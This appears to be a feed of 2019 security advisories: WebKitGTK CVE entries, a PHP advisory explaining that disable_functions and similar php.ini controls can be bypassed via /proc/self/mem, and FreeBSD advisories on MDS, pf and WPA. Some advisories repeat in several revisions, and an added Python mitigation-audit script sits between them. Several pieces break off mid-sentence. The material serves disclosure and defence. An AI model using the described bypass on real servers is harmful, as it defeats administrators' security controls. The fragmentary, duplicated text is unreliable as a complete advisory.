    Versions affected: WebKitGTK and WPE WebKit before 2.24.0.
    Credit to Suyoung Lee and Sooel Son of KAIST Web Security & Privacy Lab and HyungSeok Han and Sang Kil Cha of KAIST SoftSec Lab.
    Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling.

CVE-2019-8595
    Versions affected: WebKitGTK and WPE WebKit before 2.24.2.
    Credit to G. Geshev from MWR Labs working with Trend Micro Zero Day Initiative.
    Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling.

CVE-2019-8596
    Versions affected: WebKitGTK and WPE WebKit before 2.24.1.
    Credit to Wen Xu of SSLab at Georgia Tech.
    Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling.

CVE-2019-8597
    Versions affected: WebKitGTK and WPE WebKit before 2.24.1.
    Credit to 01 working with Trend Micro Zero Day Initiative.
    Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling.

CVE-2019-8601
    Versions affected: WebKitGTK and WPE WebKit before 2.24.1.
    Credit to Fluoroacetate working with Trend Micro's Zero Day Initiative.
    Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling.

CVE-2019-8607
    Versions affected: WebKitGTK and WPE WebKit before 2.24.2.
    Credit to Junho Jang and Hanul Choi of LINE Security Team.
    Processing maliciously crafted web content may result in the disclosure of process memory. An out-of-bounds read was addressed with improved input validation.

CVE-2019-8608
    Versions affected: WebKitGTK and WPE WebKit before 2.24.1.
    Credit to G. Geshev working with Trend Micro Zero Day Initiative.
Advisory: security controls configured in php.ini could be bypassed on Linux
"PHP is a popular general-purpose scripting language that is especially suited to web development."

PHP has deployed several features over the years that rest on incorrect architectural decisions (safe mode, https://www.php.net/manual/en/features.safe-mode.php, or open_basedir, http://news.php.net/php.internals/105606), that have unexpected security implications (register globals, https://www.php.net/manual/en/security.globals.php), or that simply violated architectural patterns and ended up in a mess (magic quotes gpc, https://www.php.net/manual/en/security.magicquotes.php).

This advisory extends that list: security controls configured via php.ini directives at the PHP_INI_SYSTEM level are ineffective on the Linux platform, because a malicious script can bypass them by writing to its own process memory. As an example, a threat actor could exploit this flaw to execute PHP functions that have been disabled via the disable_functions directive. It is quite common to disable the exec family of PHP functions in order to prevent OS command execution from PHP scripts; this weakness enables executing OS commands in such restricted configurations.

The attack has been reported to the PHP maintainers (https://bugs.php.net/bug.php?id=78006) along with proof-of-concept code (https://github.com/irsl/php-bypass-disable-functions) and the recommendation to introduce a new security measure via the fopen wrappers to prevent tampering with /proc/self/mem. The issue was acknowledged, but the proposal was rejected on the grounds that the attack could be mounted via PHP extensions as well and should therefore be addressed at the operating system level instead. At this point, I decided to publish this advisory, so that system administrators who rely on php.ini settings as their primary or only line of defense revisit their configuration and adopt other approaches to secure their applications.
FreeBSD Security Advisory FreeBSD-SA-19:07.mds [REVISED]
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=============================================================================
FreeBSD-SA-19:07.mds                                        Security Advisory
                                                          The FreeBSD Project

Topic:          Microarchitectural Data Sampling (MDS)

Category:       core
Module:         kernel
Announced:      2019-05-14
Credits:        Refer to Intel's security advisory at the URL below for
                detailed acknowledgements.
Affects:        All supported versions of FreeBSD.
Corrected:      2019-05-14 17:04:00 UTC (stable/12, 12.0-STABLE)
                2019-05-14 23:19:08 UTC (releng/12.0, 12.0-RELEASE-p4)
                2019-05-14 17:05:02 UTC (stable/11, 11.3-PRERELEASE)
                2019-05-14 23:20:16 UTC (releng/11.2, 11.2-RELEASE-p10)
CVE Name:       CVE-2018-12126, CVE-2018-12127, CVE-2018-12130, CVE-2019-11091

For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit <URL:https://security.FreeBSD.org/>.

0.   Revision history

v1.0  2019-05-14 Initial release.
v1.1  2019-05-15 Fixed date on microcode update package.
v1.2  2019-05-15 Userland startup microcode update details added.
                 Added language specifying which manufacturers are affected.

I.   Background

Modern processors make use of speculative execution, an optimization technique which performs some action in advance of knowing whether the result will actually be used.

II.  Problem Description

On some Intel processors utilizing speculative execution a local process may be able to infer stale information from microarchitectural buffers to obtain a memory disclosure.

III. Impact

An attacker may be able to read secret data from the kernel or from a process when executing untrusted code (for example, in a web browser).

IV.  Workaround

No workaround is available. Only Intel x86 based processors are affected. x86 processors from other manufacturers (eg, AMD) are not believed to be vulnerable.
Systems with users or processors in different trust domains should disable Hyper-Threading by setting the machdep.hyperthreading_allowed tunable to 0 (the redirection must be outside the quotes, or echo prints the whole string instead of appending a line to loader.conf):

# echo 'machdep.hyperthreading_allowed=0' >> /boot/loader.conf
# shutdown -r +10min "Security update"

V.   Solution

Perform one of the following: Update CPU microcode, upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date, evaluate mitigation and Hyper Threading controls, and reboot the system.

New CPU microcode may be available in a BIOS update from your system vendor, or by installing the devcpu-data package or sysutils/devcpu-data port. Ensure that the BIOS update or devcpu-data package is dated after 2019-05-14.

If using the package or port the Intel microcode update can be applied at boot time (only on FreeBSD 12 and later) by adding the following lines to the system's /boot/loader.conf:

cpu_microcode_load="YES"
cpu_microcode_name="/boot/firmware/intel-ucode.bin"

To automatically load microcode during userland startup (supported on all FreeBSD versions), add the following to /etc/rc.conf:

microcode_update_enable="YES"

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Follow additional details under "Mitigation Configuration" below.

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.
[FreeBSD 12.0-STABLE]
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12-stable.patch
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12-stable.patch.asc
# gpg --verify mds.12-stable.patch.asc

[FreeBSD 12.0-RELEASE]
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12.0.patch
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12.0.patch.asc
# gpg --verify mds.12.0.patch.asc

[FreeBSD 11.3-PRERELEASE]
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.11-stable.patch
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.11-stable.patch.asc
# gpg --verify mds.11-stable.patch.asc

[FreeBSD 11.2-RELEASE]
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.11.2.patch
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.11.2.patch.asc
# gpg --verify mds.11.2.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in <URL:https://www.FreeBSD.org/handbook/kernelconfig.html>
FreeBSD Security Advisory FreeBSD-SA-19:07.mds
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=============================================================================
FreeBSD-SA-19:07.mds                                        Security Advisory
                                                          The FreeBSD Project

Topic:          Microarchitectural Data Sampling (MDS)

Category:       core
Module:         kernel
Announced:      2019-05-14
Credits:        Refer to Intel's security advisory at the URL below for
                detailed acknowledgements.
Affects:        All supported versions of FreeBSD.
Corrected:      2019-05-14 17:04:00 UTC (stable/12, 12.0-STABLE)
                2019-05-15 13:44:27 UTC (releng/12.0, 12.0-RELEASE-p5)
                2019-05-14 17:05:02 UTC (stable/11, 11.3-PRERELEASE)
                2019-05-14 23:20:16 UTC (releng/11.2, 11.2-RELEASE-p10)
CVE Name:       CVE-2018-12126, CVE-2018-12127, CVE-2018-12130, CVE-2019-11091

For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit <URL:https://security.FreeBSD.org/>.

0.   Revision history

v1.0  2019-05-14 Initial release.
v1.1  2019-05-15 Fixed date on microcode update package.
v1.2  2019-05-15 Userland startup microcode update details added.
                 Added language specifying which manufacturers are affected.
v1.3  2019-05-15 Minor quoting nit for the HT disable loader config.
v2.0  2019-05-15 Rerelease 12.0-RELEASE patch as -p5 due to i386 panic bug.

I.   Background

Modern processors make use of speculative execution, an optimization technique which performs some action in advance of knowing whether the result will actually be used.

II.  Problem Description

On some Intel processors utilizing speculative execution a local process may be able to infer stale information from microarchitectural buffers to obtain a memory disclosure.

III. Impact

An attacker may be able to read secret data from the kernel or from a process when executing untrusted code (for example, in a web browser).

IV.  Workaround

No workaround is available. Only Intel x86 based processors are affected. x86 processors from other manufacturers (eg, AMD) are not believed to be vulnerable.
Systems with users or processors in different trust domains should disable Hyper-Threading by setting the machdep.hyperthreading_allowed tunable to 0:

# echo 'machdep.hyperthreading_allowed=0' >> /boot/loader.conf
# shutdown -r +10min "Security update"

V.   Solution

Perform one of the following: Update CPU microcode, upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date, evaluate mitigation and Hyper Threading controls, and reboot the system.

New CPU microcode may be available in a BIOS update from your system vendor, or by installing the devcpu-data package or sysutils/devcpu-data port. Ensure that the BIOS update or devcpu-data package is dated after 2019-05-14.

If using the package or port the Intel microcode update can be applied at boot time (only on FreeBSD 12 and later) by adding the following lines to the system's /boot/loader.conf:

cpu_microcode_load="YES"
cpu_microcode_name="/boot/firmware/intel-ucode.bin"

To automatically load microcode during userland startup (supported on all FreeBSD versions), add the following to /etc/rc.conf:

microcode_update_enable="YES"

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Follow additional details under "Mitigation Configuration" below.

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.

[*** v2.0 NOTE *** Only applies to 12.0-RELEASE ***]
Due to an error in the 12.0-RELEASE affecting the i386 architecture, a new set of patches is being released.
If your 12.0-RELEASE sources are not yet patched using the initially published patch, then you need to apply the mds.12.0.patch. If your sources are already updated, or patched with the patch from the initial advisory, then you need to apply the incremental patch, named mds.12.0.p4p5.patch

[FreeBSD 12.0-STABLE]
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12-stable.patch
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12-stable.patch.asc
# gpg --verify mds.12-stable.patch.asc

[FreeBSD 12.0-RELEASE, not patched with initial SA-19:07.mds patch]
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12.0.patch
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12.0.patch.asc
#
FreeBSD Security Advisory FreeBSD-SA-19:07.mds
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=============================================================================
FreeBSD-SA-19:07.mds                                        Security Advisory
                                                          The FreeBSD Project

Topic:          Microarchitectural Data Sampling (MDS)

Category:       core
Module:         kernel
Announced:      2019-05-14
Credits:        Refer to Intel's security advisory at the URL below for
                detailed acknowledgements.
Affects:        All supported versions of FreeBSD.
Corrected:      2019-05-14 17:04:00 UTC (stable/12, 12.0-STABLE)
                2019-05-14 23:19:08 UTC (releng/12.0, 12.0-RELEASE-p4)
                2019-05-14 17:05:02 UTC (stable/11, 11.3-PRERELEASE)
                2019-05-14 23:20:16 UTC (releng/11.2, 11.2-RELEASE-p10)
CVE Name:       CVE-2018-12126, CVE-2018-12127, CVE-2018-12130, CVE-2019-11091

For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

Modern processors make use of speculative execution, an optimization technique which performs some action in advance of knowing whether the result will actually be used.

II.  Problem Description

On some Intel processors utilizing speculative execution a local process may be able to infer stale information from microarchitectural buffers to obtain a memory disclosure.

III. Impact

An attacker may be able to read secret data from the kernel or from a process when executing untrusted code (for example, in a web browser).

IV.  Workaround

No workaround is available.

Systems with users or processors in different trust domains should disable Hyper-Threading by setting the machdep.hyperthreading_allowed tunable to 0 (the redirection must be outside the quotes, or echo prints the whole string instead of appending a line to loader.conf):

# echo 'machdep.hyperthreading_allowed=0' >> /boot/loader.conf
# shutdown

V.   Solution

Perform one of the following: Update CPU microcode, upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date, evaluate mitigation and Hyper Threading controls, and reboot the system.
New CPU microcode may be available in a BIOS update from your system vendor, or by installing the devcpu-data package or sysutils/devcpu-data port. Ensure that the BIOS update or devcpu-data package is dated after 2019-05-14.

If using the package or port the microcode update can be applied at boot time by adding the following lines to the system's /boot/loader.conf:

cpu_microcode_load="YES"
cpu_microcode_name="/boot/firmware/intel-ucode.bin"

Microcode updates can also be applied while the system is running. See cpucontrol(8) for details.

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Follow additional details under "Mitigation Configuration" below.

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.

[FreeBSD 12.0-STABLE]
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12-stable.patch
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12-stable.patch.asc
# gpg --verify mds.12-stable.patch.asc

[FreeBSD 12.0-RELEASE]
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12.0.patch
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12.0.patch.asc
# gpg --verify mds.12.0.patch.asc

[FreeBSD 11.3-PRERELEASE]
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.11-stable.patch
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.11-stable.patch.asc
# gpg --verify mds.11-stable.patch.asc

[FreeBSD 11.2-RELEASE]
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.11.2.patch
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.11.2.patch.asc
# gpg --verify mds.11.2.patch.asc

b) Apply the patch.
Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in <URL:https://www.FreeBSD.org/handbook/kernelconfig.html>.

Mitigation Configuration

Systems with users, processes, or virtual machines in different trust domains should disable Hyper-Threading by setting the machdep.hyperthreading_allowed tunable to 0:

# echo machdep.hyperthreading_allowed=0 >> /boot/loader.conf

To activate the MDS mitigation set the hw.mds_disable sysctl. The settings are:

0 - mitigation disabled
1 - VERW instruction (microcode) mitigation enabled
2 - Software sequence mitigation enabled (not recommended)
3 - Automatic VERW or Software selection

Automatic
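An offline audit of the settings this advisory asks for, as an added example that is not part of the FreeBSD advisory: given the text of /boot/loader.conf and /etc/rc.conf and the output of `sysctl hw.model hw.mds_disable machdep.hyperthreading_allowed` collected from a host, it applies the advisory's rules (microcode loading configured, hw.mds_disable set to 1 or 3 rather than 0 or the not-recommended 2, Hyper-Threading off when trust domains share the CPU, only Intel parts in scope). Using hw.model to tell Intel CPUs apart is this example's assumption; the advisory does not mention that sysctl. The sample inputs at the bottom are constructed, not captured from a real machine.

```python
"""Audit FreeBSD MDS (SA-19:07) mitigation settings from collected text.

Added example, not FreeBSD project code. Inputs are plain strings so the
check can run anywhere (e.g. against files gathered by a config-management
tool); nothing here touches the local system.
"""
import re

# Meaning of hw.mds_disable values, as listed in the advisory.
MDS_DISABLE_MEANING = {
    0: "mitigation disabled",
    1: "VERW instruction (microcode) mitigation enabled",
    2: "software sequence mitigation enabled (not recommended)",
    3: "automatic VERW or software selection",
}
ACCEPTABLE_MDS_DISABLE = (1, 3)


def parse_kv(text):
    """Parse loader.conf / rc.conf style lines (key=value or key="value"); last wins."""
    out = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()          # drop comments
        m = re.match(r'^([A-Za-z0-9_.]+)\s*=\s*"?([^"]*)"?\s*$', line)
        if m:
            out[m.group(1)] = m.group(2)
    return out


def parse_sysctl(text):
    """Parse `sysctl name` output lines of the form `name: value`."""
    out = {}
    for line in text.splitlines():
        name, sep, value = line.partition(":")
        if sep:
            out[name.strip()] = value.strip()
    return out


def audit_mds(loader_conf, rc_conf, sysctl_out, multi_tenant):
    """Return a list of findings; an empty list means nothing left to change.

    multi_tenant: True when users, processes or VMs in different trust
    domains share the CPU, which is the advisory's condition for
    disabling Hyper-Threading.
    """
    loader = parse_kv(loader_conf)
    rc = parse_kv(rc_conf)
    sysctl = parse_sysctl(sysctl_out)
    findings = []

    # Assumption: hw.model carries the vendor string; only Intel parts are in scope.
    if "Intel" not in sysctl.get("hw.model", ""):
        return ["non-Intel CPU reported; advisory says other x86 vendors are not "
                "believed to be vulnerable"]

    try:
        mds = int(sysctl.get("hw.mds_disable", "0"))
    except ValueError:
        mds = -1
    if mds not in ACCEPTABLE_MDS_DISABLE:
        findings.append("hw.mds_disable=%d (%s); set to 1 or 3"
                        % (mds, MDS_DISABLE_MEANING.get(mds, "unknown value")))

    # VERW needs updated microcode: loader.conf (12+), rc.conf (all), or a BIOS update.
    loader_ucode = loader.get("cpu_microcode_load", "").upper() == "YES"
    rc_ucode = rc.get("microcode_update_enable", "").upper() == "YES"
    if not (loader_ucode or rc_ucode):
        findings.append("no microcode loading configured (cpu_microcode_load / "
                        "microcode_update_enable); confirm a BIOS update dated after "
                        "2019-05-14 instead")
    if loader_ucode and not loader.get("cpu_microcode_name"):
        findings.append("cpu_microcode_load=YES but cpu_microcode_name is unset")

    # Hyper-Threading must be off, both now and across reboots, on multi-tenant hosts.
    ht_now = sysctl.get("machdep.hyperthreading_allowed", "1")
    ht_boot = loader.get("machdep.hyperthreading_allowed", "1")
    if multi_tenant and (ht_now != "0" or ht_boot != "0"):
        findings.append("Hyper-Threading still allowed on a multi-tenant host: set "
                        "machdep.hyperthreading_allowed=0 in /boot/loader.conf and reboot")
    return findings


# Constructed sample inputs (not from a real host).
SAMPLE_LOADER_CONF = """\
# constructed sample loader.conf
machdep.hyperthreading_allowed=0
cpu_microcode_load="YES"
cpu_microcode_name="/boot/firmware/intel-ucode.bin"
"""
SAMPLE_RC_CONF = 'microcode_update_enable="YES"\n'
SAMPLE_SYSCTL = """\
hw.model: Intel(R) Xeon(R) CPU (constructed sample)
hw.mds_disable: 3
machdep.hyperthreading_allowed: 0
"""

if __name__ == "__main__":
    for finding in audit_mds(SAMPLE_LOADER_CONF, SAMPLE_RC_CONF, SAMPLE_SYSCTL, True) or ["OK"]:
        print(finding)
```

Because the loader.conf check reads the file rather than trusting that the echo was run, a line that never got appended (for instance when the `>>` redirection ended up inside the quotes, so echo printed the string instead) shows up as a finding rather than passing silently.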
FreeBSD Security Advisory FreeBSD-SA-19:05.pf
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=============================================================================
FreeBSD-SA-19:05.pf                                         Security Advisory
                                                          The FreeBSD Project

Topic:          IPv6 fragment reassembly panic in pf(4)

Category:       contrib
Module:         pf
Announced:      2019-05-14
Credits:        Synacktiv
Affects:        All supported versions of FreeBSD
Corrected:      2019-03-01 18:12:05 UTC (stable/12, 12.0-STABLE)
                2019-05-14 23:10:21 UTC (releng/12.0, 12.0-RELEASE-p4)
                2019-03-01 18:12:07 UTC (stable/11, 11.3-PRERELEASE)
                2019-05-14 23:10:21 UTC (releng/11.2, 11.2-RELEASE-p10)
CVE Name:       CVE-2019-5597

For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

pf(4) is an Internet Protocol packet filter originally written for OpenBSD. In addition to filtering packets, it also has packet normalization capabilities.

II.  Problem Description

A bug in the pf(4) IPv6 fragment reassembly logic incorrectly uses the last extension header offset from the last received packet instead of from the first packet.

III. Impact

Malicious IPv6 packets with different IPv6 extensions could cause a kernel panic or potentially a filtering rule bypass.

IV.  Workaround

Only systems that use the pf(4) firewall with packet scrubbing enabled (the recommended 'scrub all in' or similar) are affected.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. Afterwards, reboot the system.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterwards, reboot the system.

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable FreeBSD release branches.
a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:05/pf.patch
# fetch https://security.FreeBSD.org/patches/SA-19:05/pf.patch.asc
# gpg --verify pf.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in <URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/12/                                                        r344706
releng/12.0/                                                      r347591
stable/11/                                                        r344707
releng/11.2/                                                      r347591
- -------------------------------------------------------------------------

To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<URL:https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII.
References https://www.synacktiv.com/ressources/Synacktiv_OpenBSD_PacketFilter_CVE-2019-5597_ipv6_frag.pdf> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5597> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-19:05.pf.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAlzbTsNfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cL1cxAAjYy90WBfuBkU/FddQWMJkXOn2YqABFxY/BfFpJEbGrnXXuxz9YJByK3b 6ikWq5HcxgL/9ek6QULwEOoNvms8tT4m4waJOLa3hZPoPlgD2ArgvdcEI00R/8T9 Z+k1YlT0oLOY4XbVynPGNmiFNTAcsg7Ognp9yam3kmPZTMGYm6cKIBy1idrzCCmI nj0SscyoL4Z09kSWe3UOitjh8cpxqGuvGosCb7YGPl6yTSalBUgP44Lyg7jS4nrZ xjZxqhAfp7tk9peF4rov8apZIsrBF5GMaahnIGIwZzmRn/E1pND9qx1lB1Uh7rfR nb8OmwbshJTWdnS1GXyLxRGJOd0zmh+YZ10ygZAQTM5sNaxfn6pWJFmr2S/mR+kN RG/Bhj+lN7jh1eUNdwk/pAm0aZZ+J8GX4/QOrqPfGDko/s/S7YwJB/DKR/14uPY7 Fwcgv4tvgoRstSKHdIe45d7/N0SgQCS/EfzVIO5XPQtkrk9/zalQubionijObr1Q ARVl7H5M7m7kP8PJz/vRNvhar0c0xTk9ov2JDxKHKTd+7D78LQEAFvEGPIFREBsY VBW8BqZbuVcsgrhr/YWFE3TEw4O0YbnY5g9wmVv+d/pdDngLuTsfbNEsAQewW
FreeBSD Security Advisory FreeBSD-SA-19:06.pf
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=============================================================================
FreeBSD-SA-19:06.pf                                         Security Advisory
                                                          The FreeBSD Project

Topic:          ICMP/ICMP6 packet filter bypass in pf

Category:       contrib
Module:         pf
Announced:      2019-05-14
Credits:        Synacktiv
Affects:        All supported versions of FreeBSD
Corrected:      2019-03-21 14:17:10 UTC (stable/12, 12.0-STABLE)
                2019-05-14 23:12:22 UTC (releng/12.0, 12.0-RELEASE-p4)
                2019-03-21 14:17:12 UTC (stable/11, 11.3-PRERELEASE)
                2019-05-14 23:12:22 UTC (releng/11.2, 11.2-RELEASE-p10)
CVE Name:       CVE-2019-5598

For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

pf(4) is an Internet Protocol packet filter originally written for OpenBSD. In addition to filtering packets, it also has packet normalization capabilities.

II.  Problem Description

States in pf(4) let ICMP and ICMP6 packets pass if they have a packet in their payload matching an existing condition. pf(4) does not check if the outer ICMP or ICMP6 packet has the same destination IP as the source IP of the inner protocol packet.

III. Impact

A maliciously crafted ICMP/ICMP6 packet could bypass the packet filter rules and be passed to a host that would otherwise be unavailable.

IV.  Workaround

No workaround is available.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. Afterwards, reboot the system.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterwards, reboot the system.

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable FreeBSD release branches.
a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:06/pf.patch
# fetch https://security.FreeBSD.org/patches/SA-19:06/pf.patch.asc
# gpg --verify pf.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in <URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/12/                                                        r345377
releng/12.0/                                                      r347593
stable/11/                                                        r345378
releng/11.2/                                                      r347593
- -------------------------------------------------------------------------

To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<URL:https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII.
References https://www.synacktiv.com/posts/systems/icmp-reachable.html> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5598> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-19:06.pf.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAlzbTsdfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cIjXA/9FevC+Ygihzb0J9MN0znEM883dk5sPCSvMwiivsNRkDMXreYqPXU+Fkt0 iV1OZ8tKwKAihm+iGJ5mzS5l40wWF1oDcqJrC0myICdvreraoJKZvTLhgGIBqKkE b8yIuzPueWdnnudoAzTV38RhyaP2aOb44OMUNPQZsEB/6hHsNvp9m6yAua/F+x9+ N9J38Y/C6udsNfhqDeuCI4G8yiN33XfFiRbF+31rt3s0rUm6KGNsJanJe8dNAEvE DN4tA4+MORnQ7QTLgOobGuLFhWJ2urC6psH8duO72hcSTzSkTZpxrC3f6SW8RlZ+ Pbr4LZ6FA3bZp/sCmWPOot94hotBDr03MZwrxURokeDHZU1nUBsw0rmTG4aypujl JrGPOAp89TtqrR0zV8DhpGO/RWoBeMDf7ZGvIplOIEF5rijQWEyC5pnYlBKPfSdm UTxcN9RoJCfz7O4KLAAqhHiuu6xc+CqlQH1dvyLbqGVv9LzUQlziTNsbQ4cGryuj g1TztU0VfpvHDkAKBh0iHwkoUqDSut3K19rFAQ3zkM/EodqSTkE1OG77pmsjYaVq AfcnN/se8lklq0lKi3BwNvVIWTjhMAwY63otVxvVD4wrJrgQH8NKgOeYuGBreXeW Uv569bIhR0/vsyGJK/SMKxBiAGfzkE7LqDMJqdXLsompX97nOwI= =m3as -END PGP SIGNATURE-
FreeBSD Security Advisory FreeBSD-SA-19:03.wpa
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

=============================================================================
FreeBSD-SA-19:03.wpa                                        Security Advisory
                                                          The FreeBSD Project

Topic:          Multiple vulnerabilities in hostapd and wpa_supplicant

Category:       contrib
Module:         wpa
Announced:      2019-05-14
Affects:        All supported versions of FreeBSD.
Corrected:      2019-05-01 01:42:38 UTC (stable/12, 12.0-STABLE)
                2019-05-14 22:57:29 UTC (releng/12.0, 12.0-RELEASE-p4)
                2019-05-01 01:43:17 UTC (stable/11, 11.2-STABLE)
                2019-05-14 22:59:32 UTC (releng/11.2, 11.2-RELEASE-p10)
CVE Name:       CVE-2019-9494, CVE-2019-9495, CVE-2019-9496, CVE-2019-9497,
                CVE-2019-9498, CVE-2019-9499, CVE-2019-11555

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <https://security.FreeBSD.org/>.

I.   Background

Wi-Fi Protected Access II (WPA2) is a security protocol developed by the
Wi-Fi Alliance to secure wireless computer networks.  hostapd(8) and
wpa_supplicant(8) are user space daemon implementations of the WPA2
protocol for access points and wireless clients, respectively.

II.  Problem Description

Multiple vulnerabilities exist in the hostapd(8) and wpa_supplicant(8)
implementations.  For more details, please see the reference URLs in the
References section below.

III. Impact

Security of the wireless network may be compromised.  For more details,
please see the reference URLs in the References section below.

IV.  Workaround

No workaround is available, but systems not using hostapd(8) or
wpa_supplicant(8) are not affected.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.
Afterwards, restart hostapd(8) or wpa_supplicant(8).

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

